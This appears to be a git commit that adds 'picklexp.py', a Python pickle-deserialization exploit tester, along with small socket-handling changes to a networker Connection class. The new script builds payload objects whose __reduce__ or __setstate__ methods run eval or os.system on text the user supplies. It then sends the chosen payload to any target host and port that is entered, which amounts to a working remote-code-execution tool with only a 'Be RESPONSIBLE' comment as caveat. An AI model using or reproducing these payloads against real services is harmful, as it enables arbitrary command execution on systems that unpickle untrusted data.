Add exploit tester!

This commit is contained in:
Captain ALM 2022-12-10 12:54:21 +00:00
parent b28c9925b9
commit 96d9e430b2
Signed by: alfred
GPG Key ID: 4E4ADD02609997B1
2 changed files with 104 additions and 4 deletions

View File

@ -100,14 +100,19 @@ class Connection:
threads = dict() threads = dict()
actives = dict() actives = dict()
def __init__(self, binder, translator, onconn, onrecv, onend): def __init__(self, binder, translator, onconn, onrecv, onend):
if binder != None:
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.bind(binder) self.socket.bind(binder)
self.socket.listen(8) self.socket.listen(8)
else:
self.socket = None
self.translator = translator self.translator = translator
self.onconn = onconn self.onconn = onconn
self.onrecv = onrecv self.onrecv = onrecv
self.onend = onend self.onend = onend
def listener(self): def listener(self):
if self.socket == None:
return
while self.active: while self.active:
s, a = self.socket.accept() s, a = self.socket.accept()
ac = a[0] + ":" + str(a[1]) ac = a[0] + ":" + str(a[1])
@ -193,7 +198,7 @@ class Connection:
break break
time.sleep(0.0001) time.sleep(0.0001)
self.threads.clear() self.threads.clear()
self.socket.close() if self.socket != None: self.socket.close()
def addresses(self): def addresses(self):
if self.active: if self.active:

95
picklexp.py Normal file
View File

@ -0,0 +1,95 @@
#BSD 3-Clause, (C) Alfred Manville 2022
#Be RESPONSIBLE when using this!
import networker as net
import pickle
import traceback
import sys
#Payloads:
#State payloads only work if the Object is available at the target
class StatePXP:
def __init__(self, data):
self.data = data
def __getstate__(self):
return self.data
def __setstate__(self, state):
self.data = state
print(self.data)
class ReducePXP:
def __init__(self, data):
self.data = data
def __reduce__(self):
return print, (self.data,)
class StateEXP:
def __init__(self, data):
self.data = data
def __getstate__(self):
return self.data
def __setstate__(self, state):
self.data = state
eval(self.data)
class ReduceEXP:
def __init__(self, data):
self.data = data
def __reduce__(self):
return eval, (self.data,)
class ReduceSXP:
def __init__(self, data):
self.data = data
def __reduce__(self):
import os
return os.system, (self.data,)
payloads = (StatePXP(""), ReducePXP(""), StateEXP(""), ReduceEXP(""), ReduceSXP(""))
payload = None
taddr = ""
tport = 0
plid = 0
pldata = ""
def onx(a):
pass
def ony(a, m):
pass
def main():
conn = net.Connection(None, net.PickleTranslate(), onx, ony, onx)
print("Running Exploit @ " + taddr + ":" + str(tport))
print("Exploit: " + str(type(payload)) + " ; Data: " + pldata)
try:
conn.connect((taddr, tport))
print("Exploiting...")
conn.send(taddr+":"+str(tport), payload)
print("Exploited!")
except:
print(traceback.format_exc())
conn.close()
exit
if __name__ == "__main__":
print("Python PicklExp (C) Alfred Manville 2022 BSD-3-Clause")
if len(sys.argv) > 1:
taddr = sys.argv[1]
else:
taddr = input("Enter the target address: ")
if len(sys.argv) > 2:
tport = int(sys.argv[2])
else:
tport = int(input("Enter the target port: "))
if len(sys.argv) > 3:
plid = int(sys.argv[3]) - 1
else:
plid = int(input("Enter the payload position " + str(payloads) + " : ")) - 1
if len(sys.argv) > 4:
pldata = sys.argv[4]
else:
pldata = input("Enter the payload data: ")
payload = payloads[plid]
payload.data = pldata
main()